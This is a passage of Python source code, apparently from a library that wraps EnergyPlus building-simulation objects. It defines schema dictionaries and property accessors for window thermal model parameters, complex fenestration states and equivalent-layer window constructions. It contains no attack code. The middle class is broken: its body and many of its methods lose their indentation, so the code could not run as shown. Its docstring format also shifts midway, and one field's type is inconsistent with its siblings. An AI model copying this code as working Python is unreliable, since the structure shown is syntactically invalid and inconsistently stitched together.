               'group': u'Surface Construction Elements',
               'min-fields': 0,
               'name': u'WindowThermalModel:Params',
               'pyname': u'WindowThermalModelParams',
               'required-object': False,
               'unique-object': False}

    # Generated field accessors: each getter's docstring also documents the
    # Args/Raises of the paired setter (pyidf convention).  Setter defaults
    # mirror the IDD defaults recorded in _schema above.

    @property
    def name(self):
        """field `Name`
        Args:
            value (str): value for IDD Field `Name`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `name` or None if not set
        """
        return self["Name"]

    @name.setter
    def name(self, value=None):
        """Corresponds to IDD field `Name`"""
        self["Name"] = value

    @property
    def standard(self):
        """field `standard`
        | Default value: ISO15099
        Args:
            value (str): value for IDD Field `standard`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `standard` or None if not set
        """
        return self["standard"]

    @standard.setter
    def standard(self, value="ISO15099"):
        """Corresponds to IDD field `standard`"""
        self["standard"] = value

    @property
    def thermal_model(self):
        """field `Thermal Model`
        | Default value: ISO15099
        Args:
            value (str): value for IDD Field `Thermal Model`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `thermal_model` or None if not set
        """
        return self["Thermal Model"]

    @thermal_model.setter
    def thermal_model(self, value="ISO15099"):
        """Corresponds to IDD field `Thermal Model`"""
        self["Thermal Model"] = value

    @property
    def sdscalar(self):
        """field `SDScalar`
        | Default value: 1.0
        | value <= 1.0
        Args:
            value (float): value for IDD Field `SDScalar`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            float: the value of `sdscalar` or None if not set
        """
        return self["SDScalar"]

    @sdscalar.setter
    def sdscalar(self, value=1.0):
        """Corresponds to IDD field `SDScalar`"""
        self["SDScalar"] = value

    @property
    def deflection_model(self):
        """field `Deflection Model`
        | Default value: NoDeflection
        Args:
            value (str): value for IDD Field `Deflection Model`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `deflection_model` or None if not set
        """
        return self["Deflection Model"]

    @deflection_model.setter
    def deflection_model(self, value="NoDeflection"):
        """Corresponds to IDD field `Deflection Model`"""
        self["Deflection Model"] = value

    @property
    def vacuum_pressure_limit(self):
        """field `Vacuum Pressure Limit`
        | Units: Pa
        | Default value: 13.238
        Args:
            value (float): value for IDD Field `Vacuum Pressure Limit`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            float: the value of `vacuum_pressure_limit` or None if not set
        """
        return self["Vacuum Pressure Limit"]

    @vacuum_pressure_limit.setter
    def vacuum_pressure_limit(self, value=13.238):
        """Corresponds to IDD field `Vacuum Pressure Limit`"""
        self["Vacuum Pressure Limit"] = value

    @property
    def initial_temperature(self):
        """field `Initial temperature`
        | This is temperature in time of window fabrication
        | Units: C
        | Default value: 25.0
        Args:
            value (float): value for IDD Field `Initial temperature`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            float: the value of `initial_temperature` or None if not set
        """
        return self["Initial temperature"]

    @initial_temperature.setter
    def initial_temperature(self, value=25.0):
        """Corresponds to IDD field `Initial temperature`"""
        self["Initial temperature"] = value

    @property
    def initial_pressure(self):
        """field `Initial pressure`
        | This is pressure in time of window fabrication
        | Units: Pa
        | Default value: 101325.0
        Args:
            value (float): value for IDD Field `Initial pressure`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            float: the value of `initial_pressure` or None if not set
        """
        return self["Initial pressure"]

    @initial_pressure.setter
    def initial_pressure(self, value=101325.0):
        """Corresponds to IDD field `Initial pressure`"""
        self["Initial pressure"] = value
class ConstructionComplexFenestrationState(DataObject):
""" Corresponds to IDD object `Construction:ComplexFenestrationState`
Describes one state for a complex glazing system
These input objects are typically generated by using WINDOW software and export to IDF syntax
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'basis type',
{'name': u'Basis Type',
'pyname': u'basis_type',
'default': u'LBNLWINDOW',
'required-field': False,
'autosizable': False,
'accepted-values': [u'LBNLWINDOW',
u'UserDefined'],
'autocalculatable': False,
'type': 'alpha'}),
(u'basis symmetry type',
{'name': u'Basis Symmetry Type',
'pyname': u'basis_symmetry_type',
'default': u'None',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Axisymmetric',
u'None'],
'autocalculatable': False,
'type': 'alpha'}),
(u'window thermal model',
{'name': u'Window Thermal Model',
'pyname': u'window_thermal_model',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'basis matrix name',
{'name': u'Basis Matrix Name',
'pyname': u'basis_matrix_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'solar optical complex front transmittance matrix name',
{'name': u'Solar Optical Complex Front Transmittance Matrix Name',
'pyname': u'solar_optical_complex_front_transmittance_matrix_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'solar optical complex back reflectance matrix name',
{'name': u'Solar Optical Complex Back Reflectance Matrix Name',
'pyname': u'solar_optical_complex_back_reflectance_matrix_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'visible optical complex front transmittance matrix name',
{'name': u'Visible Optical Complex Front Transmittance Matrix Name',
'pyname': u'visible_optical_complex_front_transmittance_matrix_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'visible optical complex back transmittance matrix name',
{'name': u'Visible Optical Complex Back Transmittance Matrix Name',
'pyname': u'visible_optical_complex_back_transmittance_matrix_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'outside layer name',
{'name': u'Outside Layer Name',
'pyname': u'outside_layer_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'outside layer directional front absoptance matrix name',
{'name': u'Outside Layer Directional Front Absoptance Matrix Name',
'pyname': u'outside_layer_directional_front_absoptance_matrix_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'outside layer directional back absoptance matrix name',
{'name': u'Outside Layer Directional Back Absoptance Matrix Name',
'pyname': u'outside_layer_directional_back_absoptance_matrix_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'gap 1 name',
{'name': u'Gap 1 Name',
'pyname': u'gap_1_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'cfs gap 1 directional front absoptance matrix name',
{'name': u'CFS Gap 1 Directional Front Absoptance Matrix Name',
'pyname': u'cfs_gap_1_directional_front_absoptance_matrix_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'cfs gap 1 directional back absoptance matrix name',
{'name': u'CFS Gap 1 Directional Back Absoptance Matrix Name',
'pyname': u'cfs_gap_1_directional_back_absoptance_matrix_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'layer 2 name',
{'name': u'Layer 2 Name',
'pyname': u'layer_2_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'layer 2 directional front absoptance matrix name',
{'name': u'Layer 2 Directional Front Absoptance Matrix Name',
'pyname': u'layer_2_directional_front_absoptance_matrix_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'layer 2 directional back absoptance matrix name',
{'name': u'Layer 2 Directional Back Absoptance Matrix Name',
'pyname': u'layer_2_directional_back_absoptance_matrix_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'gap 2 name',
{'name': u'Gap 2 Name',
'pyname': u'gap_2_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'gap 2 directional front absoptance matrix name',
{'name': u'Gap 2 Directional Front Absoptance Matrix Name',
'pyname': u'gap_2_directional_front_absoptance_matrix_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'gap 2 directional back absoptance matrix name',
{'name': u'Gap 2 Directional Back Absoptance Matrix Name',
'pyname': u'gap_2_directional_back_absoptance_matrix_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'layer 3 material',
{'name': u'Layer 3 Material',
'pyname': u'layer_3_material',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'layer 3 directional front absoptance matrix name',
{'name': u'Layer 3 Directional Front Absoptance Matrix Name',
'pyname': u'layer_3_directional_front_absoptance_matrix_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'layer 3 directional back absoptance matrix name',
{'name': u'Layer 3 Directional Back Absoptance Matrix Name',
'pyname': u'layer_3_directional_back_absoptance_matrix_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'gap 3 name',
{'name': u'Gap 3 Name',
'pyname': u'gap_3_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'gap 3 directional front absoptance matrix name',
{'name': u'Gap 3 Directional Front Absoptance Matrix Name',
'pyname': u'gap_3_directional_front_absoptance_matrix_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'gap 3 directional back absoptance matrix name',
{'name': u'Gap 3 Directional Back Absoptance Matrix Name',
'pyname': u'gap_3_directional_back_absoptance_matrix_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'layer 4 name',
{'name': u'Layer 4 Name',
'pyname': u'layer_4_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'layer 4 directional front absoptance matrix name',
{'name': u'Layer 4 Directional Front Absoptance Matrix Name',
'pyname': u'layer_4_directional_front_absoptance_matrix_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'layer 4 directional back absoptance matrix name',
{'name': u'Layer 4 Directional Back Absoptance Matrix Name',
'pyname': u'layer_4_directional_back_absoptance_matrix_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'gap 4 name',
{'name': u'Gap 4 Name',
'pyname': u'gap_4_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'gap 4 directional front absoptance matrix name',
{'name': u'Gap 4 Directional Front Absoptance Matrix Name',
'pyname': u'gap_4_directional_front_absoptance_matrix_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'gap 4 directional back absoptance matrix name',
{'name': u'Gap 4 Directional Back Absoptance Matrix Name',
'pyname': u'gap_4_directional_back_absoptance_matrix_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'layer 5 name',
{'name': u'Layer 5 Name',
'pyname': u'layer_5_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'layer 5 directional front absoptance matrix name',
{'name': u'Layer 5 Directional Front Absoptance Matrix Name',
'pyname': u'layer_5_directional_front_absoptance_matrix_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'layer 5 directional back absoptance matrix name',
{'name': u'Layer 5 Directional Back Absoptance Matrix Name',
'pyname': u'layer_5_directional_back_absoptance_matrix_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'alpha'})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 0,
'name': u'Construction:ComplexFenestrationState',
'pyname': u'ConstructionComplexFenestrationState',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def basis_type(self):
"""field `Basis Type`
| Default value: LBNLWINDOW
Args:
value (str): value for IDD Field `Basis Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `basis_type` or None if not set
"""
return self["Basis Type"]
@basis_type.setter
def basis_type(self, value="LBNLWINDOW"):
"""Corresponds to IDD field `Basis Type`"""
self["Basis Type"] = value
@property
def basis_symmetry_type(self):
"""field `Basis Symmetry Type`
| Default value: None
Args:
value (str): value for IDD Field `Basis Symmetry Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `basis_symmetry_type` or None if not set
"""
return self["Basis Symmetry Type"]
@basis_symmetry_type.setter
def basis_symmetry_type(self, value="None"):
"""Corresponds to IDD field `Basis Symmetry Type`"""
self["Basis Symmetry Type"] = value
@property
def window_thermal_model(self):
"""field `Window Thermal Model`
Args:
value (str): value for IDD Field `Window Thermal Model`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `window_thermal_model` or None if not set
"""
return self["Window Thermal Model"]
@window_thermal_model.setter
def window_thermal_model(self, value=None):
"""Corresponds to IDD field `Window Thermal Model`"""
self["Window Thermal Model"] = value
@property
def basis_matrix_name(self):
"""field `Basis Matrix Name`
Args:
value (str): value for IDD Field `Basis Matrix Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `basis_matrix_name` or None if not set
"""
return self["Basis Matrix Name"]
@basis_matrix_name.setter
def basis_matrix_name(self, value=None):
"""Corresponds to IDD field `Basis Matrix Name`"""
self["Basis Matrix Name"] = value
@property
def solar_optical_complex_front_transmittance_matrix_name(self):
"""field `Solar Optical Complex Front Transmittance Matrix Name`
Args:
value (str): value for IDD Field `Solar Optical Complex Front Transmittance Matrix Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `solar_optical_complex_front_transmittance_matrix_name` or None if not set
"""
return self["Solar Optical Complex Front Transmittance Matrix Name"]
@solar_optical_complex_front_transmittance_matrix_name.setter
def solar_optical_complex_front_transmittance_matrix_name(
self,
value=None):
"""Corresponds to IDD field `Solar Optical Complex Front Transmittance
Matrix Name`"""
self["Solar Optical Complex Front Transmittance Matrix Name"] = value
@property
def solar_optical_complex_back_reflectance_matrix_name(self):
"""field `Solar Optical Complex Back Reflectance Matrix Name`
Args:
value (str): value for IDD Field `Solar Optical Complex Back Reflectance Matrix Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `solar_optical_complex_back_reflectance_matrix_name` or None if not set
"""
return self["Solar Optical Complex Back Reflectance Matrix Name"]
@solar_optical_complex_back_reflectance_matrix_name.setter
def solar_optical_complex_back_reflectance_matrix_name(self, value=None):
"""Corresponds to IDD field `Solar Optical Complex Back Reflectance
Matrix Name`"""
self["Solar Optical Complex Back Reflectance Matrix Name"] = value
@property
def visible_optical_complex_front_transmittance_matrix_name(self):
"""field `Visible Optical Complex Front Transmittance Matrix Name`
Args:
value (str): value for IDD Field `Visible Optical Complex Front Transmittance Matrix Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `visible_optical_complex_front_transmittance_matrix_name` or None if not set
"""
return self["Visible Optical Complex Front Transmittance Matrix Name"]
@visible_optical_complex_front_transmittance_matrix_name.setter
def visible_optical_complex_front_transmittance_matrix_name(
self,
value=None):
"""Corresponds to IDD field `Visible Optical Complex Front
Transmittance Matrix Name`"""
self["Visible Optical Complex Front Transmittance Matrix Name"] = value
@property
def visible_optical_complex_back_transmittance_matrix_name(self):
"""field `Visible Optical Complex Back Transmittance Matrix Name`
Args:
value (str): value for IDD Field `Visible Optical Complex Back Transmittance Matrix Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `visible_optical_complex_back_transmittance_matrix_name` or None if not set
"""
return self["Visible Optical Complex Back Transmittance Matrix Name"]
@visible_optical_complex_back_transmittance_matrix_name.setter
def visible_optical_complex_back_transmittance_matrix_name(
self,
value=None):
"""Corresponds to IDD field `Visible Optical Complex Back Transmittance
Matrix Name`"""
self["Visible Optical Complex Back Transmittance Matrix Name"] = value
@property
def outside_layer_name(self):
"""field `Outside Layer Name`
Args:
value (str): value for IDD Field `Outside Layer Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `outside_layer_name` or None if not set
"""
return self["Outside Layer Name"]
@outside_layer_name.setter
def outside_layer_name(self, value=None):
"""Corresponds to IDD field `Outside Layer Name`"""
self["Outside Layer Name"] = value
@property
def outside_layer_directional_front_absoptance_matrix_name(self):
    """Return IDD field `Outside Layer Directional Front Absoptance Matrix Name` (str, or None if unset)."""
    return self["Outside Layer Directional Front Absoptance Matrix Name"]

@outside_layer_directional_front_absoptance_matrix_name.setter
def outside_layer_directional_front_absoptance_matrix_name(self, value=None):
    """Set IDD field `Outside Layer Directional Front Absoptance Matrix Name`."""
    self["Outside Layer Directional Front Absoptance Matrix Name"] = value
@property
def outside_layer_directional_back_absoptance_matrix_name(self):
    """Return IDD field `Outside Layer Directional Back Absoptance Matrix Name` (str, or None if unset)."""
    return self["Outside Layer Directional Back Absoptance Matrix Name"]

@outside_layer_directional_back_absoptance_matrix_name.setter
def outside_layer_directional_back_absoptance_matrix_name(self, value=None):
    """Set IDD field `Outside Layer Directional Back Absoptance Matrix Name`."""
    self["Outside Layer Directional Back Absoptance Matrix Name"] = value
@property
def gap_1_name(self):
    """Return IDD field `Gap 1 Name` (str, or None if unset)."""
    return self["Gap 1 Name"]

@gap_1_name.setter
def gap_1_name(self, value=None):
    """Set IDD field `Gap 1 Name`."""
    self["Gap 1 Name"] = value
@property
def cfs_gap_1_directional_front_absoptance_matrix_name(self):
    """Return IDD field `CFS Gap 1 Directional Front Absoptance Matrix Name` (str, or None if unset).

    Reserved for future use; leave blank in this version.
    """
    return self["CFS Gap 1 Directional Front Absoptance Matrix Name"]

@cfs_gap_1_directional_front_absoptance_matrix_name.setter
def cfs_gap_1_directional_front_absoptance_matrix_name(self, value=None):
    """Set IDD field `CFS Gap 1 Directional Front Absoptance Matrix Name`."""
    self["CFS Gap 1 Directional Front Absoptance Matrix Name"] = value
@property
def cfs_gap_1_directional_back_absoptance_matrix_name(self):
    """Return IDD field `CFS Gap 1 Directional Back Absoptance Matrix Name` (str, or None if unset).

    Reserved for future use; leave blank in this version.
    """
    return self["CFS Gap 1 Directional Back Absoptance Matrix Name"]

@cfs_gap_1_directional_back_absoptance_matrix_name.setter
def cfs_gap_1_directional_back_absoptance_matrix_name(self, value=None):
    """Set IDD field `CFS Gap 1 Directional Back Absoptance Matrix Name`."""
    self["CFS Gap 1 Directional Back Absoptance Matrix Name"] = value
@property
def layer_2_name(self):
    """Return IDD field `Layer 2 Name` (str, or None if unset)."""
    return self["Layer 2 Name"]

@layer_2_name.setter
def layer_2_name(self, value=None):
    """Set IDD field `Layer 2 Name`."""
    self["Layer 2 Name"] = value
@property
def layer_2_directional_front_absoptance_matrix_name(self):
    """Return IDD field `Layer 2 Directional Front Absoptance Matrix Name` (str, or None if unset)."""
    return self["Layer 2 Directional Front Absoptance Matrix Name"]

@layer_2_directional_front_absoptance_matrix_name.setter
def layer_2_directional_front_absoptance_matrix_name(self, value=None):
    """Set IDD field `Layer 2 Directional Front Absoptance Matrix Name`."""
    self["Layer 2 Directional Front Absoptance Matrix Name"] = value
@property
def layer_2_directional_back_absoptance_matrix_name(self):
    """Return IDD field `Layer 2 Directional Back Absoptance Matrix Name` (str, or None if unset)."""
    return self["Layer 2 Directional Back Absoptance Matrix Name"]

@layer_2_directional_back_absoptance_matrix_name.setter
def layer_2_directional_back_absoptance_matrix_name(self, value=None):
    """Set IDD field `Layer 2 Directional Back Absoptance Matrix Name`."""
    self["Layer 2 Directional Back Absoptance Matrix Name"] = value
@property
def gap_2_name(self):
    """Return IDD field `Gap 2 Name` (str, or None if unset)."""
    return self["Gap 2 Name"]

@gap_2_name.setter
def gap_2_name(self, value=None):
    """Set IDD field `Gap 2 Name`."""
    self["Gap 2 Name"] = value
@property
def gap_2_directional_front_absoptance_matrix_name(self):
    """Return IDD field `Gap 2 Directional Front Absoptance Matrix Name` (str, or None if unset).

    Reserved for future use; leave blank in this version.
    """
    return self["Gap 2 Directional Front Absoptance Matrix Name"]

@gap_2_directional_front_absoptance_matrix_name.setter
def gap_2_directional_front_absoptance_matrix_name(self, value=None):
    """Set IDD field `Gap 2 Directional Front Absoptance Matrix Name`."""
    self["Gap 2 Directional Front Absoptance Matrix Name"] = value
@property
def gap_2_directional_back_absoptance_matrix_name(self):
    """Return IDD field `Gap 2 Directional Back Absoptance Matrix Name` (str, or None if unset).

    Reserved for future use; leave blank in this version.
    """
    return self["Gap 2 Directional Back Absoptance Matrix Name"]

@gap_2_directional_back_absoptance_matrix_name.setter
def gap_2_directional_back_absoptance_matrix_name(self, value=None):
    """Set IDD field `Gap 2 Directional Back Absoptance Matrix Name`."""
    self["Gap 2 Directional Back Absoptance Matrix Name"] = value
@property
def layer_3_material(self):
    """Return IDD field `Layer 3 Material` (str, or None if unset)."""
    return self["Layer 3 Material"]

@layer_3_material.setter
def layer_3_material(self, value=None):
    """Set IDD field `Layer 3 Material`."""
    self["Layer 3 Material"] = value
@property
def layer_3_directional_front_absoptance_matrix_name(self):
    """Return IDD field `Layer 3 Directional Front Absoptance Matrix Name` (str, or None if unset)."""
    return self["Layer 3 Directional Front Absoptance Matrix Name"]

@layer_3_directional_front_absoptance_matrix_name.setter
def layer_3_directional_front_absoptance_matrix_name(self, value=None):
    """Set IDD field `Layer 3 Directional Front Absoptance Matrix Name`."""
    self["Layer 3 Directional Front Absoptance Matrix Name"] = value
@property
def layer_3_directional_back_absoptance_matrix_name(self):
    """Return IDD field `Layer 3 Directional Back Absoptance Matrix Name` (str, or None if unset)."""
    return self["Layer 3 Directional Back Absoptance Matrix Name"]

@layer_3_directional_back_absoptance_matrix_name.setter
def layer_3_directional_back_absoptance_matrix_name(self, value=None):
    """Set IDD field `Layer 3 Directional Back Absoptance Matrix Name`."""
    self["Layer 3 Directional Back Absoptance Matrix Name"] = value
@property
def gap_3_name(self):
    """Return IDD field `Gap 3 Name` (str, or None if unset)."""
    return self["Gap 3 Name"]

@gap_3_name.setter
def gap_3_name(self, value=None):
    """Set IDD field `Gap 3 Name`."""
    self["Gap 3 Name"] = value
@property
def gap_3_directional_front_absoptance_matrix_name(self):
    """Return IDD field `Gap 3 Directional Front Absoptance Matrix Name` (str, or None if unset).

    Reserved for future use; leave blank in this version.
    """
    return self["Gap 3 Directional Front Absoptance Matrix Name"]

@gap_3_directional_front_absoptance_matrix_name.setter
def gap_3_directional_front_absoptance_matrix_name(self, value=None):
    """Set IDD field `Gap 3 Directional Front Absoptance Matrix Name`."""
    self["Gap 3 Directional Front Absoptance Matrix Name"] = value
@property
def gap_3_directional_back_absoptance_matrix_name(self):
    """Return IDD field `Gap 3 Directional Back Absoptance Matrix Name` (str, or None if unset).

    Reserved for future use; leave blank in this version.
    """
    return self["Gap 3 Directional Back Absoptance Matrix Name"]

@gap_3_directional_back_absoptance_matrix_name.setter
def gap_3_directional_back_absoptance_matrix_name(self, value=None):
    """Set IDD field `Gap 3 Directional Back Absoptance Matrix Name`."""
    self["Gap 3 Directional Back Absoptance Matrix Name"] = value
@property
def layer_4_name(self):
    """Return IDD field `Layer 4 Name` (str, or None if unset)."""
    return self["Layer 4 Name"]

@layer_4_name.setter
def layer_4_name(self, value=None):
    """Set IDD field `Layer 4 Name`."""
    self["Layer 4 Name"] = value
@property
def layer_4_directional_front_absoptance_matrix_name(self):
    """Return IDD field `Layer 4 Directional Front Absoptance Matrix Name` (str, or None if unset)."""
    return self["Layer 4 Directional Front Absoptance Matrix Name"]

@layer_4_directional_front_absoptance_matrix_name.setter
def layer_4_directional_front_absoptance_matrix_name(self, value=None):
    """Set IDD field `Layer 4 Directional Front Absoptance Matrix Name`."""
    self["Layer 4 Directional Front Absoptance Matrix Name"] = value
@property
def layer_4_directional_back_absoptance_matrix_name(self):
    """Return IDD field `Layer 4 Directional Back Absoptance Matrix Name` (str, or None if unset)."""
    return self["Layer 4 Directional Back Absoptance Matrix Name"]

@layer_4_directional_back_absoptance_matrix_name.setter
def layer_4_directional_back_absoptance_matrix_name(self, value=None):
    """Set IDD field `Layer 4 Directional Back Absoptance Matrix Name`."""
    self["Layer 4 Directional Back Absoptance Matrix Name"] = value
@property
def gap_4_name(self):
    """Return IDD field `Gap 4 Name` (str, or None if unset)."""
    return self["Gap 4 Name"]

@gap_4_name.setter
def gap_4_name(self, value=None):
    """Set IDD field `Gap 4 Name`."""
    self["Gap 4 Name"] = value
@property
def gap_4_directional_front_absoptance_matrix_name(self):
    """Return IDD field `Gap 4 Directional Front Absoptance Matrix Name` (str, or None if unset).

    Reserved for future use; leave blank in this version.
    """
    return self["Gap 4 Directional Front Absoptance Matrix Name"]

@gap_4_directional_front_absoptance_matrix_name.setter
def gap_4_directional_front_absoptance_matrix_name(self, value=None):
    """Set IDD field `Gap 4 Directional Front Absoptance Matrix Name`."""
    self["Gap 4 Directional Front Absoptance Matrix Name"] = value
@property
def gap_4_directional_back_absoptance_matrix_name(self):
    """Return IDD field `Gap 4 Directional Back Absoptance Matrix Name` (str, or None if unset).

    Reserved for future use; leave blank in this version.
    """
    return self["Gap 4 Directional Back Absoptance Matrix Name"]

@gap_4_directional_back_absoptance_matrix_name.setter
def gap_4_directional_back_absoptance_matrix_name(self, value=None):
    """Set IDD field `Gap 4 Directional Back Absoptance Matrix Name`."""
    self["Gap 4 Directional Back Absoptance Matrix Name"] = value
@property
def layer_5_name(self):
    """Return IDD field `Layer 5 Name` (str, or None if unset)."""
    return self["Layer 5 Name"]

@layer_5_name.setter
def layer_5_name(self, value=None):
    """Set IDD field `Layer 5 Name`."""
    self["Layer 5 Name"] = value
@property
def layer_5_directional_front_absoptance_matrix_name(self):
    """Return IDD field `Layer 5 Directional Front Absoptance Matrix Name` (str, or None if unset)."""
    return self["Layer 5 Directional Front Absoptance Matrix Name"]

@layer_5_directional_front_absoptance_matrix_name.setter
def layer_5_directional_front_absoptance_matrix_name(self, value=None):
    """Set IDD field `Layer 5 Directional Front Absoptance Matrix Name`."""
    self["Layer 5 Directional Front Absoptance Matrix Name"] = value
@property
def layer_5_directional_back_absoptance_matrix_name(self):
    """Return IDD field `Layer 5 Directional Back Absoptance Matrix Name` (str, or None if unset)."""
    return self["Layer 5 Directional Back Absoptance Matrix Name"]

@layer_5_directional_back_absoptance_matrix_name.setter
def layer_5_directional_back_absoptance_matrix_name(self, value=None):
    """Set IDD field `Layer 5 Directional Back Absoptance Matrix Name`."""
    self["Layer 5 Directional Back Absoptance Matrix Name"] = value
class ConstructionWindowEquivalentLayer(DataObject):

    """Corresponds to IDD object `Construction:WindowEquivalentLayer`.

    Layer fields run from the outside layer inward.  Up to 11 layers
    are allowed in total: at most six solid layers and five gaps.
    Each field holds the material name of that layer.
    """

    _schema = {
        'extensible-fields': OrderedDict(),
        'fields': OrderedDict([
            (u'name',
             {'name': u'Name', 'pyname': u'name', 'required-field': True,
              'autosizable': False, 'autocalculatable': False,
              'type': u'alpha'}),
            (u'outside layer',
             {'name': u'Outside Layer', 'pyname': u'outside_layer',
              'required-field': True, 'autosizable': False,
              'autocalculatable': False, 'type': u'object-list'}),
            (u'layer 2',
             {'name': u'Layer 2', 'pyname': u'layer_2',
              'required-field': False, 'autosizable': False,
              'autocalculatable': False, 'type': u'object-list'}),
            (u'layer 3',
             {'name': u'Layer 3', 'pyname': u'layer_3',
              'required-field': False, 'autosizable': False,
              'autocalculatable': False, 'type': u'object-list'}),
            (u'layer 4',
             {'name': u'Layer 4', 'pyname': u'layer_4',
              'required-field': False, 'autosizable': False,
              'autocalculatable': False, 'type': u'object-list'}),
            (u'layer 5',
             {'name': u'Layer 5', 'pyname': u'layer_5',
              'required-field': False, 'autosizable': False,
              'autocalculatable': False, 'type': u'object-list'}),
            (u'layer 6',
             {'name': u'Layer 6', 'pyname': u'layer_6',
              'required-field': False, 'autosizable': False,
              'autocalculatable': False, 'type': u'object-list'}),
            (u'layer 7',
             {'name': u'Layer 7', 'pyname': u'layer_7',
              'required-field': False, 'autosizable': False,
              'autocalculatable': False, 'type': u'object-list'}),
            (u'layer 8',
             {'name': u'Layer 8', 'pyname': u'layer_8',
              'required-field': False, 'autosizable': False,
              'autocalculatable': False, 'type': u'object-list'}),
            (u'layer 9',
             {'name': u'Layer 9', 'pyname': u'layer_9',
              'required-field': False, 'autosizable': False,
              'autocalculatable': False, 'type': u'object-list'}),
            (u'layer 10',
             {'name': u'Layer 10', 'pyname': u'layer_10',
              'required-field': False, 'autosizable': False,
              'autocalculatable': False, 'type': u'object-list'}),
            (u'layer 11',
             {'name': u'Layer 11', 'pyname': u'layer_11',
              'required-field': False, 'autosizable': False,
              'autocalculatable': False, 'type': u'object-list'})]),
        'format': None,
        'group': u'Surface Construction Elements',
        'min-fields': 2,
        'name': u'Construction:WindowEquivalentLayer',
        'pyname': u'ConstructionWindowEquivalentLayer',
        'required-object': False,
        'unique-object': False}

    @property
    def name(self):
        """Return IDD field `Name` (str, or None if unset)."""
        return self["Name"]

    @name.setter
    def name(self, value=None):
        """Set IDD field `Name`."""
        self["Name"] = value

    @property
    def outside_layer(self):
        """Return IDD field `Outside Layer` (str, or None if unset)."""
        return self["Outside Layer"]

    @outside_layer.setter
    def outside_layer(self, value=None):
        """Set IDD field `Outside Layer`."""
        self["Outside Layer"] = value

    @property
    def layer_2(self):
        """Return IDD field `Layer 2` (str, or None if unset)."""
        return self["Layer 2"]

    @layer_2.setter
    def layer_2(self, value=None):
        """Set IDD field `Layer 2`."""
        self["Layer 2"] = value

    @property
    def layer_3(self):
        """Return IDD field `Layer 3` (str, or None if unset)."""
        return self["Layer 3"]

    @layer_3.setter
    def layer_3(self, value=None):
        """Set IDD field `Layer 3`."""
        self["Layer 3"] = value

    @property
    def layer_4(self):
